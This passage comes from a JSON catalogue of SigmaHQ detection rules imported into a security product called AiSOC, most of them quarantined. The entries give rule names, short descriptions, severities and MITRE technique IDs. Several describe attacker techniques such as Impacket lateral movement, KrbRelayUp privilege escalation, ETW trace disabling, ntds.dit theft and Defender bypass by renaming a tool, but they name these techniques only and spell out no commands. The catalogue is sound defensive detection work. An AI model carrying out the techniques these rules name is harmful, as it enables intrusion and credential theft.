upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10b97915-ec8d-455f-a815-9a78926585f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml" } }, { "id": "sigmahq-sigma-10c14723-61c7-4c75-92ca-9af245723ad2", "type": "detection", "name": "HackTool - Potential Impacket Lateral Movement Activity", "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-potential-impacket-lateral-movement-activity.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10c14723-61c7-4c75-92ca-9af245723ad2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" } }, { "id": "sigmahq-sigma-10cb6535-b31d-4512-9962-513dcbc42cc1", "type": "detection", "name": "PUA - System Informer Driver Load", "description": "Detects driver load of the System Informer tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-system-informer-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10cb6535-b31d-4512-9962-513dcbc42cc1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_pua_system_informer.yml" } }, { "id": "sigmahq-sigma-10fb649c-3600-4d37-b1e6-56ea90bb7e09", "type": "detection", "name": "User Added To Highly Privileged Group", "description": "Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-highly-privileged-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "10fb649c-3600-4d37-b1e6-56ea90bb7e09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml" } }, { "id": "sigmahq-sigma-11063ec2-de63-4153-935e-b1a8b9e616f1", "type": "detection", "name": "Linux Remote System Discovery", "description": "Detects the enumeration of other remote systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-remote-system-discovery.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11063ec2-de63-4153-935e-b1a8b9e616f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" } }, { "id": "sigmahq-sigma-1114e048-b69c-4f41-bc20-657245ae6e3f", "type": "detection", "name": "User Discovery And Export Via Get-ADUser Cmdlet", "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-discovery-and-export-via-get-aduser-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1114e048-b69c-4f41-bc20-657245ae6e3f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml" } }, { "id": "sigmahq-sigma-1139d2e2-84b1-4226-b445-354492eba8ba", "type": "detection", "name": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usage-of-web-request-commands-and-cmdlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1139d2e2-84b1-4226-b445-354492eba8ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" } }, { "id": "sigmahq-sigma-114de787-4eb2-48cc-abdb-c0b449f93ea4", "type": "detection", "name": "Suspicious X509Enrollment - Process Creation", "description": "Detect use of X509Enrollment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-x509enrollment-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml" } }, { "id": "sigmahq-sigma-114e7f1c-f137-48c8-8f54-3088c24ce4b9", "type": "detection", "name": "Remote Access Tool - AnyDesk Silent Installation", "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-silent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml" } }, { "id": "sigmahq-sigma-115fdba9-f017-42e6-84cf-d5573bf2ddf8", "type": "detection", "name": "Disable of ETW Trace - Powershell", "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-of-etw-trace-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" } }, { "id": 
"sigmahq-sigma-11701de9-d5a5-44aa-8238-84252f131895", "type": "detection", "name": "Docker Container Discovery Via Dockerenv Listing", "description": "Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/docker-container-discovery-via-dockerenv-listing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11701de9-d5a5-44aa-8238-84252f131895", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml" } }, { "id": "sigmahq-sigma-117d3d3a-755c-4a61-b23e-9171146d094c", "type": "detection", "name": "Suspicious Outlook Macro Created", "description": "Detects the creation of a macro file for Outlook.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-outlook-macro-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "117d3d3a-755c-4a61-b23e-9171146d094c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml" } }, { "id": "sigmahq-sigma-1182f3b3-e716-4efa-99ab-d2685d04360f", "type": "detection", "name": "History File Deletion", "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/history-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1182f3b3-e716-4efa-99ab-d2685d04360f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" } }, { "id": "sigmahq-sigma-1193d960-2369-499f-a158-7b50a31df682", "type": "detection", "name": "Potential Suspicious Browser Launch From Document Reader Process", "description": "Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. 
And connects to a web application over http(s), this could indicate a possible phishing attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-browser-launch-from-document-reader-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1193d960-2369-499f-a158-7b50a31df682", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_browser_launch_from_document_reader_process.yml" } }, { "id": "sigmahq-sigma-11b1ed55-154d-4e82-8ad7-83739298f720", "type": "detection", "name": "NTDS.DIT Creation By Uncommon Process", "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-dit-creation-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11b1ed55-154d-4e82-8ad7-83739298f720", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml" } }, { "id": "sigmahq-sigma-11b52f18-aaec-4d60-9143-5dd8cc4706b9", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - System", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml" } }, { "id": "sigmahq-sigma-11c767ae-500b-423b-bae3-b234450736ed", "type": "detection", "name": "Users Added to Global or Device Admin Roles", "description": "Monitor and alert for users added to device admin roles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/users-added-to-global-or-device-admin-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11c767ae-500b-423b-bae3-b234450736ed", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml" } }, { "id": "sigmahq-sigma-11d00fff-5dc3-428c-8184-801f292faec0", "type": "detection", "name": "Service Registry Key Read Access Request", "description": "Detects \"read access\" requests on the services registry key.\nAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-registry-key-read-access-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "11d00fff-5dc3-428c-8184-801f292faec0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml" } }, { "id": "sigmahq-sigma-1228c958-e64e-4e71-92ad-7d429f4138ba", "type": "detection", "name": "Script Interpreter Execution From Suspicious Folder", "description": "Detects suspicious script execution from suspicious directories or folders accessible by environment variables that may indicate malware activity.\nScript interpreters (cscript, wscript, mshta, powershell) executing from folders like Temp, Public, or user 
profile directories may suggest attempts to evade detection or execute malicious scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-interpreter-execution-from-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" } }, { "id": "sigmahq-sigma-123e4e6d-b123-48f8-b261-7214938acaf0", "type": "detection", "name": "Startup/Logon Script Added to Group Policy Object", "description": "Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001", "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/startup-logon-script-added-to-group-policy-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "123e4e6d-b123-48f8-b261-7214938acaf0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml" } }, { "id": "sigmahq-sigma-1277f594-a7d1-4f28-a2d3-73af5cbeab43", "type": "detection", "name": "Windows Shell/Scripting Application File Write to Suspicious Folder", "description": "Detects Windows shells and scripting applications that write files to suspicious folders", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-shell-scripting-application-file-write-to-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" } }, { "id": "sigmahq-sigma-1279262f-1464-422f-ac0d-5b545320c526", "type": "detection", "name": "AWS KMS Imported Key Material Usage", "description": "Detects the import or deletion of key material in AWS KMS, which can be used as part of ransomware attacks. 
This activity is uncommon and provides a high certainty signal.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1608.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-kms-imported-key-material-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1279262f-1464-422f-ac0d-5b545320c526", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_kms_import_key_material.yml" } }, { "id": "sigmahq-sigma-12827a56-61a4-476a-a9cb-f3068f191073", "type": "detection", "name": "HackTool - KrbRelayUp Execution", "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-krbrelayup-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12827a56-61a4-476a-a9cb-f3068f191073", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml" } }, { "id": 
"sigmahq-sigma-128faeef-79dd-44ca-b43c-a9e236a60f49", "type": "detection", "name": "Unfamiliar Sign-In Properties", "description": "Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unfamiliar-sign-in-properties.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "128faeef-79dd-44ca-b43c-a9e236a60f49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml" } }, { "id": "sigmahq-sigma-129966c9-de17-4334-a123-8b58172e664d", "type": "detection", "name": "Potential Windows Defender AV Bypass Via Dump64.EXE Rename", "description": "Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.\nCurrently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-windows-defender-av-bypass-via-dump64-exe-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "129966c9-de17-4334-a123-8b58172e664d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dump64_defender_av_bypass_rename.yml" } }, { "id": "sigmahq-sigma-12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "type": "detection", "name": "Potentially Suspicious Execution Of PDQDeployRunner", "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on remote machines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-of-pdqdeployrunner.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" } }, { "id": "sigmahq-sigma-12ba6a38-adb3-4d6b-91ba-a7fb248e3199", "type": "detection", "name": "Password Policy Enumerated", "description": "Detects when the password policy is enumerated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/password-policy-enumerated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12ba6a38-adb3-4d6b-91ba-a7fb248e3199", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_password_policy_enumerated.yml" } }, { "id": "sigmahq-sigma-12d027c3-b48c-4d9d-8bb6-a732200034b2", "type": "detection", "name": "Azure Kubernetes Service Account Modified or Deleted", "description": "Identifies when a service account is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531", "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-service-account-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-12e6d621-194f-4f59-90cc-1959e21e69f7", "type": "detection", "name": "Register new Logon Process by Rubeus", "description": "Detects potential use of Rubeus via registered new trusted logon process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/register-new-logon-process-by-rubeus.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" } }, { "id": "sigmahq-sigma-12f6b752-042d-483e-bf9c-915a6d06ad75", "type": "detection", "name": "Windows Firewall Disabled via PowerShell", "description": "Detects attempts to disable the Windows Firewall using PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-firewall-disabled-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml" } }, { "id": "sigmahq-sigma-12fbff88-16b5-4b42-9754-cd001a789fb3", "type": "detection", "name": "CodePage Modification Via MODE.COM To Russian Language", "description": "Detects a CodePage modification using the \"mode.com\" utility to Russian 
language.\nThis behavior has been used by threat actors behind Dharma ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codepage-modification-via-mode-com-to-russian-language.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "12fbff88-16b5-4b42-9754-cd001a789fb3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml" } }, { "id": "sigmahq-sigma-130c9e58-28ac-4f83-8574-0a4cc913b97e", "type": "detection", "name": "Potential Winnti Dropper Activity", "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 